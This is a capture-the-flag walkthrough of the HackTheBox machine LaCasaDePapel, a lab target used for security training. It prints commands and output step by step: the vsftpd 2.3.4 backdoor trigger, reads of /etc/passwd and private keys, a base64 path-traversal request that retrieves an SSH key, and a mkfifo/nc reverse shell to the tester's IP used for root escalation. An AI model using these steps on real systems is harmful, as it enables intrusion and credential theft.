$ nmap -sC -sV -oA nmapscan 10.10.10.131
# -sC : Scan with default NSE scripts.
# -sV : Attempts to determine the version of the service running on port
# -oA : Output in the three major formats at once
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
80/tcp open http Node.js (Express middleware)
443/tcp open ssl/http Node.js Express framework
HTTP 80/tcp
playing around with the site seems we can't pull anything.
view-source : doesn't have any special information.
Robots.txt : We can’t connect to the server at lacasadepel.htb. so let's add the domain to /etc/hosts
echo "10.10.10.131 lacasadepapel.htb" | sudo tee -a /etc/hosts
and we get " Cannot GET /robots.txt"
SSL/HTTP 443
Why the website doesn't trust my certificate?
After searching it turns out we need to have a certificate from the root.
Now "Accept the risk and continue"
Now we need a certificate from the host
FTP 21/tcp : vsftpd 2.3.4
Let's see is this version is vulnerable or not. For fast search i use searchsploit. And it seemes there is a Metasploit module for it . Since my approach is OSCP so i won't use metasploit.
So to run vsf_sysutil_extra() you have to login with a smily face :)
that means in hex \x3A\x29\ (ASCII-Code).
This function was placed in sysdeputil.c file and that file is for Highly system dependent utilities - e.g. authentication, capabilities. Reading that file says that that function opens a new TCP socket listening on port 6200 and span a shell when connected to this port
$ telnet 10.10.10.131 21
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
USER :)
331 Please specify the password.
PASS smile
# if it waiting that means that the backdoor has opened
Psy Shell
# Connect to the shell
$ nc 10.10.10.131 6200
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
help
help Show a list of commands. Type `help [foo]` for information about [foo]. Aliases: ?
ls List local, instance or class variables, methods and constants. Aliases: list, dir
dump Dump an object or primitive.
doc Read the documentation for an object, class, constant, method or property. Aliases: rtfm, man
show Show the code for an object, class, constant, method or property.
wtf Show the backtrace of the most recent exception. Aliases: last-exception, wtf?
whereami Show where you are in the code.
throw-up Throw an exception or error out of the Psy Shell.
timeit Profiles with a timer.
trace Show the current call stack.
buffer Show (or clear) the contents of the code input buffer. Aliases: buf
clear Clear the Psy Shell screen.
edit Open an external editor. Afterwards, get produced code in input buffer.
sudo Evaluate PHP code, bypassing visibility restrictions.
history Show the Psy Shell history. Aliases: hist
exit End the current session and return to caller. Aliases: quit, q
ls
Variables: $tokyo
whereami
From phar:///usr/bin/psysh/src/functions.php:307:
302| $config['colorMode'] = Configuration::COLOR_MODE_FORCED;
303| } elseif ($input->getOption('no-color')) {
304| $config['colorMode'] = Configuration::COLOR_MODE_DISABLED;
305| }
306|
> 307| $shell = new Shell(new Configuration($config));
308|
309|
310| if ($usageException !== null || $input->getOption('help')) {
311| if ($usageException !== null) {
312| echo $usageException->getMessage() . PHP_EOL . PHP_EOL;
# Since this is a php we can use php functions to enumerate
get_current_user()
=> "root"
scandir("/root")
PHP Warning: scandir(/root): failed to open dir: Permission denied in phar://eval()'d code on line 1'
scandir("/home")
=> [
".",
"..",
"berlin",
"dali",
"nairobi",
"oslo",
"professor",
]
scandir("/home/berlin")
=> [
".",
"..",
".ash_history",
".ssh",
"downloads",
"node_modules",
"server.js",
"user.txt",
]
scandir("/home/berlin/downloads")
=> [
".",
"..",
"SEASON-1",
"SEASON-2",
"Select a season",
]
scandir("/home/berlin/downloads/SEASON-1/")
=> [
".",
"..",
"01.avi",
"02.avi",
"03.avi",
"04.avi",
"05.avi",
"06.avi",
"07.avi",
"08.avi",
"09.avi",
"10.avi",
"11.avi",
"12.avi",
"13.avi",
"Donwload a video",
]
# when trying to file_get_contents we get nothing
scandir("/home/berlin/downloads/SEASON-2/")
=> [
".",
"..",
"01.avi",
"02.avi",
"03.avi",
"04.avi",
"05.avi",
"06.avi",
"07.avi",
"08.avi",
"09.avi",
"Donwload a video",
]
# when trying to file_get_contents we get nothing
# when trying to file_get_contents to "Select a season" we get nothing
scandir("/home/berlin/.ssh")
PHP Warning: scandir(/home/berlin/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1'
echo file_get_contents("/home/berlin/user.txt")
PHP Warning: file_get_contents(/home/berlin/user.txt): failed to open stream: Permission denied in phar://eval()'d code on line 1'
scandir("/home/dali")
=> [
".",
"..",
".ash_history",
".config",
".qmail-default",
".ssh",
"server.js",
]
scandir("/home/dali/.ssh")
=> [
".",
"..",
"authorized_keys",
"known_hosts",
]
echo file_get_contents("/home/dali/.ssh/authorized_keys")
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsDHKXtzjeyuWjw42RbtoDy2c6lWdtfEzsmqmHrbJDY2hDcKWekWouWhe/NTCQFim6weKtsEdTzh0Qui+6jKc8/ZtpKzHrXiSXSe48JwpG7abmp5iCihzDozJqggBNoAQrvZqBhg6svcKh8F0kTnxUkBQgBm4kjOPteN+TfFoNIod7DQ72/N25D/lVThCLcStbPkR8fgBz7TGuTTAsNFXVwjlsgwi2qUF9UM6C1JkMBk5Y9ssDHiu4R35R5eCl4EEZLL946n/Gd5QB7pmIRHMkmt2ztOaKU4xZthurZpDXt+Et+Rm3dAlAZLO/5dwjqIfmEBS1eQ4sT8hlUkuLvjUDw== thek@ThekMac.local
echo file_get_contents("/home/dali/.ssh/known_hosts")
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNli8Xx10a0s+zrkT1eVfM1kRaAQaK+a/mxYxhPxpK0094QFQBcVrvrXb3+j4M8l2G/C9CtQRWVXpX8ajWhYRik=
echo file_get_contents("/home/dali/.qmail-default")
|bouncesaying This\ address\ no\ longer\ accepts\ mail.
echo file_get_contents("/home/dali/server.js")
const net = require('net')
const spawn = require('child_process').spawn
const server = net.createServer(function(socket) {
const sh = spawn('/usr/bin/psysh')
sh.stdin.resume()
sh.stdout.on('data', function (data) {
socket.write(data)
})
sh.stderr.on('data', function (data) {
socket.write(data)
})
socket.on('data', function (data) {
try {
sh.stdin.write(data)
}
catch(e) {
socket.end()
}
})
socket.on('end', function () {
})
socket.on('error', function () {
})
});
server.listen(6200, '0.0.0.0');
# This server.js file allows any client that can connect to port 6200 on the host machine to interact
# with a PHP interactive shell (psysh).
scandir("/home/nairobi")
=> [
".",
"..",
"ca.key",
"download.jade",
"error.jade",
"index.jade",
"node_modules",
"server.js",
"static",
]
echo file_get_contents("/home/nairobi/server.js")
PHP Warning: file_get_contents(/home/nairobi/server.js): failed to open stream: Permission denied in phar://eval()'d code on line 1'
echo file_get_contents("/home/nairobi/ca.key")
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
... snip ...
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
scandir("/home/oslo/")
=> [
".",
"..",
"Maildir",
"inbox.jade",
"index.jade",
"node_modules",
"package-lock.json",
"server.js",
"static",
]
scandir("/home/professor")
=> [
".",
"..",
".ash_history",
".ssh",
"memcached.ini",
"memcached.js",
"node_modules",
]
scandir("/home/professor/.ssh")
PHP Warning: scandir(/home/professor/.ssh): failed to open dir: Permission denied in phar://eval()'d code on line 1'
echo file_get_contents("/home/professor/memcached.ini")
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
# that could be used to privilege escalation
# users?
echo file_get_contents("/etc/passwd")
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
# copy and save this file
now we have /etc/passwd (list of the users) and ca.key , but what is ca.key do?
that means with ca.key we can generate certificate for ourself and conncet to port 443
Why do we need a certificate?
when you connect to a website via HTTPS, the server sends its SSL/TLS certificate to your browser. Your browser verifies the certificate and, if valid, establishes an encrypted session with the server. This ensures that the communication between the client and the server is secure.
In mutual TLS (mTLS), the client (e.g., your browser) must also present its own certificate to the server. This adds an extra layer of authentication because both sides are proving their identity through certificates. For the server to trust the client’s certificate, the client certificate must be signed by a trusted Certificate Authority (CA). The server checks this certificate just like the client checks the server’s certificate in traditional TLS.
If you can obtain the CA’s private key, you could generate a valid client certificate, allowing you to authenticate to the server.
Generate client certificate with ca.key
# Create Client Key
$ openssl genrsa -out client.key 4096
# Create the signing (csr)
$ openssl req -new -key client.key -out client.csr
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:US
Locality Name (eg, city) []:US
Organization Name (eg, company) [Internet Widgits Pty Ltd]:US
Organizational Unit Name (eg, section) []:Us
Common Name (e.g. server FQDN or YOUR name) []:US
Email Address []:US@US.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
# just enter for no password
# Sign the CSR to create a client certificate
$ openssl x509 -req -in client.csr -CA lacasadepapel-htb.pem -CAkey ca.key -CAcreateserial -out client.crt -days 365 -sha256
Certificate request self-signature ok
subject=C=US, ST=US, L=US, O=US, OU=Us, CN=US, emailAddress=US@US.com
# now we have client.crt but we need to import this into firefox so we will create PKCS#12 (.p12) file
openssl pkcs12 -export -inkey client.key -in client.crt -out client.p12
Enter Export Password:
Verifying - Enter Export Password:
# enter for now password
Import client.p12 in firefox
Now let's see can we view the website
press OK and now we can continue our enumertaion for this
SSL/HTTP 443 again
This looks like /home/berlin/downloads , so lets try to download the files and see what is in it
# (1) for season 2
$ ls -la | grep .avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 01(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 01.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 02(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 02.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 03(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 03.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 04(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 04.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 05(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 05.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 06(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 06.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 07(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 07.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 08(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 08.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 09(1).avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 09.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 10.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 11.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 12.avi
-rw-rw-r-- 1 kali kali 0 Oct 11 21:26 13.avi
# all the files are empty
unfortunately we can't download id_rsa like we have downloaded the episodes that didn't work ... wait a second how we even download it
# looking at urls , we see it slightly changes
https://lacasadepapel.htb/file/U0VBU09OLTEvMDEuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDIuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDMuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDQuYXZp
https://lacasadepapel.htb/file/U0VBU09OLTEvMDUuYXZp
now we need to analyze what is that string says
so this is base64 encoded string by that format SEASON/01.avi, now we will try to pull id_rsa with this method.
We will use the same site to decode this "../.ssh/id_rsa" -> Li4vLnNzaC9pZF9yc2E=
# now we will get the file
$ curl https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=
curl: (60) server verification failed: certificate signer not trusted. (CAfile: /etc/ssl/certs/ca-certificates.crt CRLfile: none)
# to solve this add -k
$ curl -k https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E=
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
... snip ...
X3a0iF5JE3kAAAAYYmVybGluQGxhY2FzYWRlcGFwZWwuaHRiAQID
-----END OPENSSH PRIVATE KEY-----
# save it to id_rsa
$ curl -k https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E= > id_rsa
# and now let try to login
$ ssh -i id_rsa berlin@10.10.10.131
berlin@10.10.10.131 s password:
# seems like this is not for berlin, its for another user. and since we have passwd we can see which user we can login with
$ cat passwd | grep ash
root:x:0:0:root:/root:/bin/ash
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
# trying root for greedy but same result as berlin so its professor
$ ssh -i id_rsa professor@10.10.10.131
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0664 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
professor@10.10.10.131 s password:
# to solve this use sudo
$ sudo ssh -i id_rsa professor@10.10.10.131
_ ____ ____ ____ _
| | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
| | / _ | | | / _ / __|/ _ | | | | |/ _ \ | |_) / _ | _ \ / _ \ |
| |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
|_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
|_|
lacasadepapel [~]$ id
uid=1002(professor) gid=1002(professor) groups=1002(professor)
lacasadepapel [~]$ pwd
/home/professor
lacasadepapel [~]$ ls
memcached.ini memcached.js node_modules
# what is my ip?
$ ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.16.8 netmask 255.255.254.0 destination 10.10.16.8
# inet is ipv4
# To transfer the file we will create python web server and download from it
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
# now download the file from
lacasadepapel [~]$ curl http://10.10.16.8:8000/linpeas.sh -o peas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 318k 100 318k 0 0 266k 0 0:00:01 0:00:01 --:--:-- 266k
lacasadepapel [~]$ chmod +x peas.sh
lacasadepapel [~]$ ./peas.sh
================================( Processes, Cron, Services, Timers & Sockets )================================
5496 nobody 0:27 /usr/bin/node /home/professor/memcached.js
# this file belongs to professor folder
lacasadepapel [~]$ ls -la
total 344
drwxr-sr-x 4 professor professor 4096 Oct 12 02:24 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
lrwxrwxrwx 1 root professor 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professor professor 4096 Jan 31 2019 .ssh
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
drwxr-sr-x 9 root professor 4096 Oct 3 2022 node_modules
-rwxr-xr-x 1 professor professor 325864 Oct 12 02:24 peas.sh
# we can't read memcached.js but we can read memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
# since .js file is being used that means .ini is being used too! and that file can run things as sudo
# but we can't write to it since we are not the one who created it (root)
# but we own the folder :) we can create the same rename it or even delete it (for best practice don't delete)
lacasadepapel [~]$ mv memcached.ini memcached.old
lacasadepapel [~]$ ls
memcached.js memcached.old node_modules peas.sh
# now create Reverse Shell and run it with .ini file
We will use revshells site
# setup a listener
$ nc -lvnp 6868
# create the shell file and memcached.ini
lacasadepapel [~]$ cd /tmp/
lacasadepapel [/tmp]$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 6868 >/tmp/f' >> shell.sh
Try 'chmod --help' for more information.
lacasadepapel [/tmp]$ chmod +x shell.sh
lacasadepapel [/tmp]$ cd ~
# since there is no nano or vim we will use vi and to save files in vi press ESC button and :wq
lacasadepapel [~]$ vi memcached.ini
[program:memcached]
command = su -c /tmp/shell.sh
# and now wait for a connect to your nc
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.131] 41927
/bin/sh: can't access tty; job control turned off
/ # /bin/sh: fa: not found
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # wc /home/berlin/user.txt
1 1 33 /home/berlin/user.txt
/ # wc /root/root.txt
1 1 33 /root/root.txt
